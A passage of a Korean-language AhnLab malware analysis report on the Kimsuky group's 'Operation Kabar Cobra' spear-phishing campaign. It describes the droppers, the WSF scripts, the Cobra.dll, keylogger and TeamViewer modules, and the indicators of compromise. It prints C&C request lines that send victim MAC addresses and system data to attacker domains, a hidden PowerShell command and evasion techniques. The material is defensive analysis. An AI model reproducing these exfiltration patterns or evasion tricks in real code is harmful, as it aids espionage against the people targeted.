Operation Kabar Cobra Kimsuky 공격그룹의최신타깃공격사례분석 안랩시큐리티대응센터 (ASEC) 대응팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : w
|
|
- 정현 낭
- 5 years ago
- Views:
Transcription
1 Operation Kabar Cobra Kimsuky 공격그룹의최신타깃공격사례분석 안랩시큐리티대응센터 (ASEC) 대응팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : AhnLab, Inc. All rights reserved.
2 목차 개요... 3 오퍼레이션카바코브라 (Operation Kabar Cobra)... 4 악성코드상세분석 공격대상별드롭퍼 (Dropper) 분석 악성스크립트및기능별악성코드분석 악성코드프로파일링 공격대상의변화 악성코드유포지및 C&C 서버 공격배후추정근거 결론 안랩제품대응현황 IoC (Indicators of Compromise) 정보 별첨 AhnLab, Inc. All rights reserved. 2
3 개요 지난 2019 년 1 월 7 일, 통일부출입기자단을대상으로악성코드가첨부된메일이발송됐다. 해당메일과 악성코드는이른바 Kimsuky( 김수키또는킴수키 ) 로불리는공격그룹의것으로추정된다. 지난 2013 년처음알려진 Kimsuky 공격그룹은 2019 년현재까지활발하게활동하고있다. 특히최근에 는제 2 차북미정상회담을앞두고주변국내부의반응에대한정보를수집하는한편, 금융분야와암호 화폐분야를대상으로지속적인공격을시도하고있다. 본보고서는 Kimsuky 그룹이배후로지목되는최신표적공격사례를상세히분석하고, 공격그룹을특 정한기술적근거를서술한다. AhnLab, Inc. All rights reserved. 3
4 오퍼레이션카바코브라 (Operation Kabar Cobra) Kimsuky 그룹은정보수집의목적으로군사관련분야와언론사를지속적으로공격하고있는가운데최근에는금전적이득을목적으로암호화폐를포함한다양한산업분야에표적공격을확대하고있다. 이과정에서다수의악성코드를유포했는데, 일부공격에서 Cobra 라는이름의파일과 KABAR 라는뮤텍스문자열이확인되었다. [ 그림 1] Cobra.dll 3 파일에서확인된 KABAR 뮤텍스문자열 이를토대로안랩은 Kimsuky 그룹이그배후로추정되는최근일련의표적공격을 오퍼레이션카바코 브라 (Operation Kabar Cobra) 로명명했다. 악성코드상세분석 1. 공격대상별드롭퍼 (Dropper) 분석 안랩시큐리티대응센터 (AhnLab Security Emergency response Center, ASEC) 는 Kimsuky 그룹의활동으로 보이는공격시도를지속적으로모니터링및분석해왔다. [ 표 1] 은 2018 년 12 월부터올해 1 월사이에 ASEC 이확인한 Kimsuky 공격그룹의악성코드 ( 드롭퍼, Dropper) 와공격대상을요약한것이다. AhnLab, Inc. All rights reserved. 4
5 발견시기파일명위장파일형식공격대상 사업계획서.hwp{ 공백 }.exe 한글 (.hwp) (ROTC 2018 정기총회 ) 군사관련분야 (ROTC) 미디어권력이동 6- 넷플렉스, 유 튜브.hwp{ 공백 }.exe 한글 (.hwp) ( 문화콘텐츠생태계 ) 언론분야 ( 통일부기자단 ) 한글 (.hwp) 중국 - 연구자료.hwp{ 공백 }.scr ( 중국관련독서와여행의순 서 ) 미확인 [ 표 1] 공격대상별드롭퍼파일명및위장파일형식 (* 파일발견시기와실제유포시기는상이할수있음 ) 공격자는한글 (hwp) 문서아이콘으로위장하는한편, 파일이름에이중확장자를적용했다. 특히확장자 사이에다수의공백을추가해공격대상이쉽게알아차리지못하게했다. 이로써앞부분의.hwp 확장 자만보이게했으나, 파일의실제확장자는공백뒤에위치하고있는.exe 나.scr 이다. 윈도우 (Windows) 의폴더옵션보기설정에따라서차이가있지만일반적으로대부분의사용자는기본 설정인알려진파일형식의파일확장명숨기기상태를유지하고있다. 따라서 [ 표 1] 과같은이름의파 일을 PC 에다운로드하면한글 (hwp) 파일인것처럼보인다. 또한해당악성코드가실행될때정상적인한글파일문서처럼보이는화면이나타난다. 이때나타나는 파일은공격타깃이수신했던메일이나업무와밀접한내용처럼위장하고있다. [ 표 1] 에요약한공격대상별악성코드의상세한기능과동작방식을살펴보면다음과같다. AhnLab, Inc. All rights reserved. 5
6 (1) 군사관련분야 - 사업계획서.hwp{ 공백 }.exe [ 그림 2] 군사관련기관을노린악성코드파일 [ 그림 2] 는군사관련기관 (ROTC) 에유포된 2019 사업계획서.hwp{ 공백 }.exe 파일로, 위장용파일인 1.hwp 와함께추가악성코드다운로드및 C&C 통신등악의적인수행하는악성스크립트 2 종 (2.wsf, 3.wsf) 으로구성되어있다. [ 그림 3] 위장용파일 1.hwp 의내용 공격타깃을속이기위한위장용파일인 1.hwp 는 [ 그림 3] 과같이공격대상과관련된내용을포함하고 있다. 공격자는실제존재하는행사이름을도용해공격타깃의의심을피하고자했다. AhnLab, Inc. All rights reserved. 6
7 (2) 언론분야 - 미디어권력이동 6- 넷플렉스, 유튜브.hwp{ 공백 }.exe ( ) 2019 년 1 월 7 일에통일부기자단을대상으로 [ 그림 4] 와같은내용의이메일이발송되었다. 발송자 : 윤 **(human-ad@hanmail.net) 제목 : RE: TF 참고자료 본문내용 : TF 참고바랍니다 * 언론사별브랜드관련해서관리잘해주세요 ( 비번은 tf) 첨부파일 : TF 참고.zip [ 그림 4] 언론관계자를대상으로유포된악성메일의내용 해당메일에첨부된압축파일 (TF 참고.zip) 에는정상적인 PDF 문서 2 종 ( 넷플릭스 - 미디어 - 구조와 - 이용자 - 경험.pdf, 언론사별도브랜드.pdf), 이중확장자를가진악성코드 1 개 ( 미디어권력이동 6- 넷플렉스, 유튜 브.hwp{ 공백 }.exe) 등총 3 개의파일이포함되어있다. [ 그림 5] 언론관계자들에게유포된악성코드 [ 그림 5] 에서볼수있는것처럼언론관계자들에게유포된악성코드의형태는앞서확인한군사기관을 노린악성코드와동일한형태로구성되어있다. 이중에서위장용파일인 1.hwp 는공격타깃에맞춰언 론사웹사이트에게시된기사를도용하고있다 ([ 그림 6] 참고 ). AhnLab, Inc. All rights reserved. 7
8 [ 그림 6] 위장용파일 1.hwp 의콘텐츠 ( 왼쪽 ) 과실제언론사기사 위에서살펴본군사기관대상공격사례와언론분야공격사례모두위장용한글파일 (.hwp) 과악성스크립트가자동압축풀림 (WinRAR SFX) 으로압축되어있다. 해당압축파일을실행하면압축해제와동시에 [ 그림 7] 과같은옵션에의해악성코드가실행된다. 실제악성행위는이때실행된악성스크립트에의해시작되며, C&C 정보는공격자의구글드라이브로부터다운로드한다. [ 그림 7] 악성파일의등록정보예시 AhnLab, Inc. All rights reserved. 8
9 (3) 기타 ( 미상 ) - 중국 - 연구자료.hwp{ 공백 }.scr ( ) [ 표 1] 의악성코드중공격대상이명확하게파악되지않은중국 - 연구자료.hwp{ 공백 }.scr 는앞서살펴본 사례들과달리파일구조와동작방식이변경되었다. 중국 - 연구자료.hwp{ 공백 }.scr 는위장용파일과함께 C&C 정보파일, 그리고악성코드를리소스형태로 갖고있다. 공격타깃이해당파일을실행하면 [ 그림 8] 과같이악성코드를생성및실행하기위해리소 스관련함수비롯해다양한함수를호출한다. [ 그림 8] 악성코드 (AlyacMonitor.db) 와 C&C 정보파일 (AlyacMonitor.db_ini) 생성과정 위장용파일역시 [ 그림 8] 과같은과정으로생성되어화면에나타난다. 이때보이는내용은 [ 그림 9] 와 같이중국역사와관련된추천도서와그에대한간략한소개로구성되어있다. AhnLab, Inc. All rights reserved. 9
10 [ 그림 9] 위장용파일 ( 중국 - 연구자료.hwp) 의내용 2. 악성스크립트및기능별악성코드분석 앞서살펴본언론분야사례 ( 미디어권력이동 6- 넷플렉스, 유튜브.hwp{ 공백 }.exe) 를중심으로악성스크 립트와악성코드별상세기능에대해살펴본다. (1) 2.wsf 2.wsf 는악성코드를추가로다운로드및실행한다. 이때필요한 C&C 정보는공격자의구글드라이브로 부터다운로드한다. [ 그림 10] 공격자의구글드라이브에서 C&C 정보다운로드 AhnLab, Inc. All rights reserved. 10
11 [ 그림 11] 은공격자의구글드라이브에업로드된파일로, 악성코드를다운로드하기위한 C&C 정보가포 함되어있다. 이파일의내용은공격자에의해언제든지변경될수있다. 일반적으로다운로드기능을수행하는악성코드는내부에고정된 C&C 정보를갖고있다. 따라서해당 C&C 서버가차단될경우, 공격자는새로악성코드를제작하여배포해야하는번거로움이있다. 그러나이번사례의경우, C&C 서버가차단되더라도공격자는자신의구글드라이브에업로드한파일의내용만변경하면악성코드가새로운 C&C 서버와통신하며지속적으로악의적인기능을수행할수있다. [ 그림 11] 공격자의구글드라이브에업로드된파일 한편, [ 그림 11] 의하단에서볼수있는이메일주소 (countine.protector.mail@gmail.com) 는과거에서피 싱메일발신계정으로사용된바있다. 이와관련해지난 2018 년, 교육분야사이버안전센터 ECSC 에 서 [ 그림 12] 와같은권고문을게시한바있다. AhnLab, Inc. All rights reserved. 11
12 [ 그림 12] 공격자관련이메일계정에대한 2018 년보안권고문 2.wsf 가추가로다운로드한악성코드 (brave.ct) 는 [ 그림 13] 과같은과정을거쳐복호화된다. 이에의해 생성된 Freedom.dll 이파워쉘을통해실행된다. 단, 감염 PC 가 64 비트윈도우환경일경우 AhnLabMon.dll 로생성된다. [ 그림 13] 추가로다운로드된악성코드실행과정 AhnLab, Inc. All rights reserved. 12
13 (2) 3.wsf 2.wsf 와마찬가지로 3.wsf 도공격자의구글드라이브에업로드된파일로부터 C&C 정보를다운로드한다. [ 그림 14] 공격자의구글드라이브에서 C&C 정보다운로드 그러나 2.wsf 는단순히악성코드를추가로다운로드하고실행하는악성스크립트인반면, 3.wsf 는 [ 표 2] 와같이다양한기능을수행한다. 기능 설명 1 encode:function(c) 2 decode:function(c) 3 _utf8_encode:function(b) 4 _utf8_decode:function(a) C&C 서버와송수신하는데이터를 BASE64 로암호화또는복호화시사용 5 binaryfiletobase64:function(c) 6 function delete_file(a) 파일삭제 7 function exec_cmd(c) 명령실행 8 function send_log(a) 9 function send(b,c) 로그전송 10 function download(c) 파일다운로드 11 function upload(j,m) 파일업로드 12 function update() 3.wsf 업데이트 [ 표 2] 3.wsf 의기능 AhnLab, Inc. All rights reserved. 13
14 안랩이분석할당시, C&C 서버와의통신이가능했기때문에 3.wsf 가 C&C 서버와어떻게통신했으며, 공 격자가내린명령은무엇인지상당부분파악할수있었다. 3.wsf 는 [ 표 2] 에표기된기능을수행하기에앞서 C&C 서버로부터자신의버전정보를수신하여현재 감염 PC 에서실행되고있는자신의버전과비교하는작업을수행한다. 만약 C&C 서버를통해확인한 버전정보가현재버전보다상위일경우 [ 그림 15] 와같이업데이트된 3.wsf 를다운로드하고실행한다. [ 그림 15] 3.wsf 의버전정보비교및업데이트 안랩의분석당시, 해당악성코드가 C&C 서버로부터수신한 3.wsf 의최신버전은 1.2 였다 ([ 그림 16] 참 고 ). [ 그림 16] 분석당시 C&C 서버로부터수신한 3.wsf 버전정보 버전정보를확인한이후 3.wsf 는 C&C 서버로부터명령을수신하고실행하기위해다음과같은형식으 로파라미터를구성한다. 이후 C&C 서버에 GET 요청을하고, 그에대한응답으로 C&C 서버로부터 BASE64 로암호화된명령을수신하여실행한다. AhnLab, Inc. All rights reserved. 14
15 - C&C 명령을수신을위해 C&C 로전송될때파라미터형식 xhr.open(get,serverurl+/board.php?m=+mac_addr+&v=+version+ +TIMEOUT,false); xhr.send(); C&C 서버로전송할파라미터형식에서 3.wsf 의버전을파라미터로구성하는이유는공격자가현재감 염 PC 에서실행중인 3.wsf 의버전을확인하고, 버전별감염 PC 현황을파악하기위한목적으로보인다. MAC_ADDR = 감염 PC 의맥주소 VERSION = 3.wsf 의파일버전 (ex, VERSION=1.2) TIMEOUT = 3.wsf 에설정된타임아웃시간 (ex, TIMEOUT=3) [ 그림 17] 은 3.wsf 가 C&C 서버와통신한내역중일부로, 3.wsf 가 C&C 서버로부터파일다운로드명령 을수신하고 list.dll 파일을다운로드하는과정이다. [ 그림 17] 3.wsf 의 C&C 서버통신내역 1- 악성코드다운로드 특이한점은 3.wsf 의코드에는 [ 그림 17] 의과정을거쳐다운로드한 list.dll(cobra.dll) 를실행하는코드가 존재하지않는다는것이다. 그러나안랩은분석을통해 2.wsf 가다운로드한 Freedom.dll(AhnLabMon.dll) 이동일한 list.dll(cobra.dll) 을다운로드하고실행하는것을확인하였다. AhnLab, Inc. All rights reserved. 15
16 (3) list.dll(cobra.dll) 안랩의분석결과, list.dll(cobra.dll) 은감염 PC 에서다음과같은정보를수집하여 C&C 서버로전송하는 등의역할을하는것으로확인됐다. 드라이브의볼륨정보및하드웨어정보획득 폴더및파일목록수집 압축파일복사 [ 그림 18] 과 [ 그림 19] 는 list.dll(cobra.dll) 이감염 PC 에서폴더및파일목록을수집하고수집된정보를 C&C 서버로전송하는패킷이다. [ 그림 18] 폴더및파일목록수집 ( 왼쪽 ) 및수집된정보의 C&C 서버전송 ( 오른쪽 ) [ 그림 19] C&C 서버로전송된감염 PC 의폴더및파일목록 AhnLab, Inc. All rights reserved. 16
17 [ 그림 19] 에서보이는감염 PC 의폴더및파일목록이 C&C 서버로전송되면공격자는다음과같은두 가지목적으로활용할수있다. (1) 공격타깃의 PC 일경우, PC 제어및중요자료유출 (2) 분석가의 PC 일경우, 분석방해 분석툴강제종료, 허위플래그 (False Flag) 심기등 안랩의분석당시, 공격자는 (2) 번의목적으로추가명령을전송했다. 공격자는앞서 list.dll(cobra.dll) 이 수집한 PC 정보를분석해감염 PC 가분석가의시스템인것을파악할수있었을것으로보인다. [ 그림 20] 은공격자가전송한추가명령을복호화한것으로, 안랩이분석을위해해당악성코드샘플을저장한경로를볼수있다. 감염된 PC가분석가의 PC임을확인한공격자는감염 PC에서실행되고있는 3.wsf에 BASE64로암호화된명령을전송, cmd 명령을이용해특정경로에존재하는모든파일을삭제하도록했다. [ 그림 20] 3.wsf 의 C&C 서버통신내역 2 - cmd 명령실행 또한 [ 그림 20] 에서볼수있는것처럼 3.wsf는명령을수행한결과를 cmd_result로저장하여 C&C 서버로전송하도록되어있다. 그러나안랩의분석당시감염 PC와 C&C 서버의통신패킷에서는해당명령의결과를확인할수없었다. 다만, 감염 PC의 HDD 볼륨정보를획득하는아래의명령에대한실행결과는 [ 그림 21] 과같이 cmd_result로저장하여 C&C 서버로전송하는것이확인되었다. - C&C 통신예시 3 //cmd powershell.exe -windowstyle hidden get-psdrive -psprovider filesystem AhnLab, Inc. All rights reserved. 17
18 [ 그림 21] 3.wsf 의 C&C 서버통신내역 3 -HDD 의볼륨정보전송 한편, 안랩시큐리티대응센터 (ASEC)sms 3.wsf가다운로드한 list.dll(cobra.dll) 을분석하는과정에서한가지특징을발견했다. list.dll(cobra.dll) 은 2018년 12월 27일 (13:38:14) 에제작되었으며, 특정기능을실행할때마다 OutputDebugStringA() 를호출하여디버그메시지를출력한다. 이는공격자가의도한기능이정상적으로구현되는지테스트하기위한목적으로보인다. 또한 [ 그림 22] 와같이 C&C 서버와통신하는부분에어색한한글로작성된디버그메시지 ( 용량이 2메가안넘음 ) 가존재한다. [ 그림 22] OutputDebugStringA() 와한글디버그메시지 참고로, 2019 년 1 월 8 일 (03:11:11) 에제작된변종에서는 OutputDebugStringA() 를호출하는코드가제거 되었다 ([ 그림 23] 참고 ). [ 그림 23] 2018 년 12 월악성코드 ( 왼쪽 ) 과 2019 년 1 월변종 ( 오른쪽 ) AhnLab, Inc. All rights reserved. 18
19 (4) Freedom.dll( 또는 AhnLabMon.dll) 2.wsf가다운로드한 Freedom.dll(AhnLabMon.dll) 의주요기능은아래와같다. 공격자의구글드라이브에서 C&C 서버정보다운로드 64비트용 Freedom.dll(AhnLabMon.dll) 다운로드및실행 C&C로감염 PC 정보전송 악성코드추가다운로드및실행 - 추가다운로드파일형태 : Cobra_ 감염 PC의맥주소 ( 예 : Cobra_AABBCCDDEEFF) 감염 PC 정보를 C&C 서버로전송 앞서살펴본 2.wsf 나 3.wsf 와같이 Freedom.dll 도공격자의구글드라이브에업로드된특정파일로부터 C&C 서버정보를다운로드한다. [ 그림 24] 공격자의구글드라이브에서 C&C 다운로드 이후 [ 그림 25] 와같이 IsWow64Process() 를호출하여감염 PC의운영체제를확인해 64비트일경우자기자신의 64비트용버전을다운로드하고실행한다. 또한 DeleteUrlCacheEntryA() 를호출하여다운로드흔적을삭제하는데, 이는향후디지털포렌식을수행할경우악성코드유입경로등을파악하지못하도록방해하기위한목적으로보인다. [ 그림 25] 64 비트용악성코드다운로드및흔적삭제 AhnLab, Inc. All rights reserved. 19
20 안랩분석당시, 감염 PC와 C&C 서버의통신패킷에서 [ 그림 25] 의코드와관련된패킷을확인할수있었는데, 해당패킷에 AhnLab.cab이포함되어있었다. 파일명에서알수있는것처럼공격자가마치보안업체인안랩이제작한파일인것처럼위장한것으로, 실제로는 cab 파일이아니라암호화된파일이다. 해당파일이암호화되어있는이유는다운로드과정에서네트워크보안장비의탐지를회피하고디지털포렌식을방해하기위한것으로보인다 ([ 그림 26] 참고 ). [ 그림 26] 64 비트용 Freedom.dll( 또는 AhnLabMon.dll) 다운로드 암호화되어있는 AhnLab.cab 은복호화과정을거친후 AhnLabMon.dll 로생성되고, 아래와같은파라미 터를구성하여실행된다. - 자기자신의 64 비트용버전을실행하기위한파라미터 : C:\Windows\system32\rundll32.exe %TEMP%\ 임시파일명.tmp, RunControl 또한 Freedom.dll(AhnLabMon.dll) 도맥주소, IP, 감염시간, 운영체제버전등감염 PC 의정보를수집하 여 C&C 서버에전송하는데, 이때파라미터형식은다음과같다. - 감염 PC 정보를 C&C 로전송시파라미터 h**p://my-homework.890m.com/******/*****?word=com_[ 맥주소 ]&NOTE=[BASE64 로암호화된감염 PC 정보 ] AhnLab, Inc. All rights reserved. 20
21 [ 그림 27] C&C 서버로전송되는감염 PC 정보 안랩분석당시, C&C 정보에는 27 개 IP 의감염정보가 com_ 맥주소.txt 형식으로저장되어있었다. 이들 IP 에는실제감염 PC 와분석가의 PC 정보가뒤섞여있었으며, 실제감염피해가있는 PC 비율을정확하 게산출할수는없었다. 그러나이들 27 개 IP 의감염정보를토대로최초감염이발생한시점 ( :13:52) 을확인할수 있었으며, 이로미루어공격자는통일부출입기자단을대상으로악성코드를유포하기에앞서지난 2018 년말부터다양한분야를대상으로악성코드를유포했음을알수있다. [ 그림 28] C&C 서버에업로드된감염 PC 의정보 AhnLab, Inc. All rights reserved. 21
22 [ 그림 29] 는악성코드를추가로다운로드하기위한 C&C 서버와의통신패킷으로, 몇가지특징이발견 됐다. [ 그림 29] 추가악성코드다운로드패킷 가변적인파일명추가로다운로드되는파일의이름은 Cobra_ + 감염 PC의맥주소의형태다. 따라서악성코드의파일명패턴과감염 PC의맥주소를모르면파일을다운로드할수없다. 또악성코드가바로다운로드되는것이아니라여러번의다운로드실패후성공했다. 일반적으로 C&C 서버와연결되면바로추가악성코드가다운로드되는것과다른점이다. 공격자는기존에수집한감염 PC의정보를분석하여실제공격타깃인 PC에만악성코드를추가로다운로드한것으로보인다. 즉, 분석가등의도하지않은사람또는시스템에서파일을다운로드할수없도록해둔것이다. 공격자는 2017년에제작한 core.dll에서도이러한방식을사용했다. 당시 core.dll은악성한글문서와함께유포됐으며, 악성코드를추가로다운로드하는 URL에감염 PC의맥주소를사용했다 ([ 그림 30] 참고 ). [ 그림 30] 2017 년 core.dll 의동작방식 AhnLab, Inc. All rights reserved. 22
23 암호화된파일다운로드다운로드한파일을암호화한것은다운로드과정에서네트워크보안장비에의해탐지되는것을회피하고디지털포렌식을방해하기위함이다. 암호화된파일은감염 PC에다운로드된후 [ 그림 31] 의복호화과정을거쳐실행가능한악성코드로생성된다. [ 그림 31] 복호화코드 ( 왼쪽 ) 및복호화전후 ( 오른쪽 ) 동일한파일명및함수명 Freedom.dll(AhnLabMon.dll) 은 Rundll32.exe 를통해복호화된 3 개의 Cobra.dll 에공통적으로존재하는 Query() 를실행한다 ([ 그림 32] 참고 ). [ 그림 32] Cobra.dll 실행방식 AhnLab, Inc. All rights reserved. 23
24 (5) Cobra.dll 복호화된 Cobra.dll 3 개의특징및기능은 [ 표 3] 과같다. 구분 Cobra.dll 1 Cobra.dll 2 특징 3.wsf가다운로드한 list.dll(cobra.dll) 와동일한파일 C&C 정보 (nid-mail.esy.es) 는하드코딩되어있음 Cobra.dll 1와동일하지만 C&C 서버정보는별도의 ini로부터읽어옴 감염 PC 의플랫폼에따라각각아래의악성코드다운로 Cobra.dll 3 드, 복호화및실행 - 32 비트윈도우일경우 : secu32_init, private32-64 비트윈도우일경우 : secu64_init, private64 [ 표 3] Cobra.dll 의특징및기능 [ 그림 33] Cobra.dll 의다운로드및복호화과정 AhnLab, Inc. All rights reserved. 24
25 Cobra.dll 3 은 2017 년에제작된 core.dll 이추가로다운로드하는 1F46.tmp 와동일한기능을하는데, 파일 다운로드, 복호화및실행, 레지스트리값추가, 중복실행방지를위한뮤텍스생성등이그것이다 ([ 그 림 34] 참고 ). [ 그림 34] 2017 년 1F46.tmp 와 2019 년 Cobra.dll 3 의코드 Cobra.dll 3 에는자신이다운로드한 private32.db, secu32_init.inf 에존재하는 EXPORT 함수의주소를획득 하는코드가존재한다. 그러나실제로는 [ 그림 35] 에표시된함수만사용한다. [ 그림 35] Cobra.dll 3 의 DLL 로딩및함수주소획득과정 AhnLab, Inc. All rights reserved. 25
26 이러한점으로미루어공격자는악성코드제작시기존코드를재사용해중복되는기능을조금씩수정 했음을짐작할수있다. (6) private32.db 및 secu32_init.inf private32.db 와 secu32_init.inf 는상호의존적으로동작한다. private32.db 가악의적인기능을수행하면 secu32_init.inf 가그결과를 C&C 서버로전송하는구조다. 구분 주요기능 백도어 키로깅 private32.db 화면캡쳐 시스템정보수집 - 드라이브볼륨, 맥주소, 폴더및파 일목록등 secu32_init.inf 의 EXPORT 함수호출 인터넷연결상태체크 secu32_init.inf 다운로드흔적삭제및다운로드 감염 PC 에서수집한정보전송 - 화면캡쳐, 키로깅데 이터등 [ 표 4] private32.db 와 secu32_init.inf 의기능 [ 그림 36] 는 private32.db 와 secu32_init.inf 의상호의존적인동작방식을보여주는것으로, 감염 PC 에서 수집한키로깅데이터를 C&C 서버로전송하는과정이다. AhnLab, Inc. All rights reserved. 26
27 [ 그림 36] 2019 년 private32.db 와 secu32_init.inf 의동작방식예시 [ 그림 36] 의과정을거쳐감염 PC 에서수집한정보를 C&C 서버로전송할때각정보의종류를식별할 수있도록특정문자열이식별자로사용된다. 이또한 2017 년에제작된악성코드와동일한방식으로, [ 표 5] 와같이시기별변종에따라식별자로사용하는문자열은다르다. 시기 문자열 운영체제정보 : 감염 PC 의맥주소 _micky_ _ 년 화면캡쳐 : 감염 PC 의맥주소 _jeny_ _ 키로깅데이터 : 감염 PC 의맥주소 _rose_ _ 폴더및파일목록 : 감염 PC 맥주소 _AllList_ _ (Cobra.dll 2019 년 이수행 ) 화면캡쳐 : 감염 PC 맥주소 _tojeny_ _ 키로깅데이터 : 감염 PC 맥주소 _rosemary_ _ [ 표 5] 변종별특징적인문자열 AhnLab, Inc. All rights reserved. 27
28 [ 그림 37] 감염 PC 에서수집한정보를 C&C 서버로전송하는패킷 안랩이분석할당시, 감염 PC 에서수집된정보가 C&C 서버로전송되는것을확인할수있었다 ([ 그림 37] 참고 ). 또한 C&C 서버에는실제감염 PC 에서전송된것으로보이는캡쳐화면도존재했다 ([ 그림 38] 참고 ). [ 그림 38] C&C 서버에존재하는감염 PC 의정보및화면캡쳐 공격자는대략 2017 년부터 private32db 와 secu32_init.inf 를제작한것으로보인다. [ 그림 39] 는 2017 년에 제작된 private32 와 secu32_init 의동작방식의일부로, [ 그림 36] 과동일한내용임을확인할수있다. AhnLab, Inc. All rights reserved. 28
29 [ 그림 39] 2017 년제작된 private32 와 secu32_init 의동작방식 이보고서에서는 2017년과 2019년에제작된 private32.db와 secu32_init.inf에대해서만설명했지만, 안랩은 2018년에도변종이제작되었음을확인했다. 2017년부터 2019년현재까지공격자가 3년간제작한악성코드는일부 EXPORT 함수명만다르고코드는동일하거나함수명과코드모두동일하다 ([ 그림 40] 참고 ). [ 그림 40] 연도별 private32.db 와 secu32_init.inf 의코드 ( 왼쪽부터 2017 년, 2018 년, 2019 년순 ) AhnLab, Inc. All rights reserved. 29
30 한편, 지난 3 년간공격자가제작한다수의악성코드중 private32.db 와 secu32_init.inf 의발견빈도는높 지않았으며, 필요에따라악성한글문서나중간다운로더등다른악성코드와함께간헐적으로사용 됐다. 이러한양상은앞으로도지속될것으로보인다. (7) tvengine.dll과 MsMpQhp.exe tvengine.dll는앞서살펴본군사관련기관에유포된파일 ( 사업계획서.hwp{ 공백 }.exe) 과비슷한시기에유포된것으로보인다. 특히동일한 C&C 서버 (my-homework.890m.com) 에서유포되었다는점에서두악성코드가관련있을가능성이높다. 사업계획서.hwp{ 공백 }.exe tvengine.dll 발견시기 : :09 유포지 my-homework.890m.com h**ps://myhomework.890m.com/gnu/download/tveng ine.dll [ 표 6] 악성코드발견시기및유포주소 tvengine.dll 에는암호화된 TeamViwer 3.0 버전이존재하며, 복호화후 MsMpQhp.exe 로생성및실행한 다. [ 그림 41] MsMpQhp.exe 의복호화과정 AhnLab, Inc. All rights reserved. 30
31 tvengine.dll의변종을분석한결과, 파일의 TimeStamp를토대로공격자는최소 2년전부터간헐적으로변종을제작한것으로보인다. [ 표 7] 은 tvengine.dll 변종의정보를요약한것이다. 이들 4개변종에는공통적으로 EXPORT Names에 tvengine.dll이란파일명이존재하며, 해당파일들을실행하면 TeamViwer 3.0 버전의동일한 MsMpQhp.exe를생성한다. 파일명 TimeStamp MD5 EXPORT 함수명 복호화키 tvengine.dll :08:11 GMT+09 a45ba001c3abee03bda49c6816d9a17 c Query ariak.dll :53:59 GMT+09 0a50827a4897a43a882c8d3c691d943 d EntryFunc 0xB316A62 IECheck.dll :55:43 GMT+09 02dae3046d1669a55785ba935b0e3f0 b Run 7 45D3.tmp :29:48 GMT+09 ba89337af43f0b07a35cc892ac95112a Run [ 표 7] tvengine.dll 의변종악성코드 [ 표 7] 의 IECheck.dll과 45D3.tmp는 2017년에제작 유포된악성한글문서및관련 core.dll과연관성을갖고있다. 공격자는대략 2017년 4월경부터 7월까지국가기관및대학교직원들을대상으로이메일을통해악성한글문서를유포했다. 메일수신자가해당악성한글문서를열면 core.dll에감염되며, core.dll이 C&C 서버와통신한후다수의추가악성코드를 PC에다운로드및실행했다. 이때다운로드된파일에 IECheck.dll과 45D3.tmp이포함되어있었다. [ 그림 42] 2017 년 core.dll 의다운로드기능 AhnLab, Inc. All rights reserved. 31
32 한편, MsMpQhp.exe 는등록정보, TimeStamp, 내부문자열등을분석한결과, 약 12 년전에제작된 TeamViewer 3.0 으로확인되었다. 공격자는 [ 그림 43] 과같이해당버전을이용하여공격대상 PC 를제어 하려고했다. [ 그림 43] MsMpQhp.exe 의정보 MsMpQhp.exe 는 UPX 로실행압축되어있다. 압축해제후코드를확인한결과, 아래와같은 PDB 정보 를확인할수있었다. - PDB Path: c:\\teamviewer\\teamviewer\\release\\teamviewer.pdb 공격자는과거에도 TeamViwer 를악용한사례가있다. 당시에는 TeamViwer 버전 5 를이용하였는데, 이 번공격에사용된 MsMpQhp.exe 와유사한 PDB Path 정보를갖고있다. 2013_netsvcs.exe_ab73b c48d62b7eeb5c9f3409d - PDB Path: c:\teamviewer5_release\teamviewer\release\teamviewer.pdb 2014_spl.exe_b02f f0912b2ae3f27498c448f - PDB Path: F:\Work\Tool\Timeviewer\ \ie_moth\Release\ie_moth.pdb - PDB Path: c:\teamviewer5_release\teamviewer\release\teamviewer.pdb 2014_xpsp2.exe_11fc4829c2fff9fb240acbd71c60fc67 - PDB Path: F:\Work\Tool\Timeviewer\ \ie_moth\Release\ie_moth.pdb - PDB Path: c:\teamviewer5_release\teamviewer\release\teamviewer.pdb AhnLab, Inc. All rights reserved. 32
33 (8) AlyacMonitor.db와 AlyacMonitor.db_ini 올해초유포된중국-연구자료.hwp{ 공백 }.scr 파일은 AlyacMonitor.db 파일을생성한다. AlyacMonitor.db 은앞서살펴본 Freedom.dll( 또는 AhnLabMon.dll) 과동일한기능을수행하지만, C&C 정보를특정레지스트리경로에추가하는기능을갖고있다는점에서차이를보인다. 이는기존의 Freemon.dll(AhnLabMon.dll) 이자신과동일한경로에존재하는 ini 파일에서 C&C 정보를읽어와 C&C 서버와통신하는방식의단점을보완한것이다. 기존의 Freemon.dll(AhnLabMon.dll) 는 C&C 정보를저장하고있는 ini 파일이어떤이유로존재하지않을경우 C&C 서버와통신할수없으며, 결과적으로악의적인기능을수행할수없게된다. 이에반해 AlyacMonitor.db는 ini 파일이존재하지않더라도특정레지스트리경로에추가해둔 C&C 정보를읽어와 C&C 서버와통신하여악의적인기능을수행할수있다 ([ 그림 44] 참고 ). [ 그림 44] 레지스트리에 C&C 정보추가기능 악성코드프로파일링 악성코드분석은파일의기능을파악하여악성여부를판별한후백신에시그니처를업데이트하는일련 의과정이라할수있다. 이에반해악성코드프로파일링은악성코드분석을통해추출한악성코드의 AhnLab, Inc. All rights reserved. 33
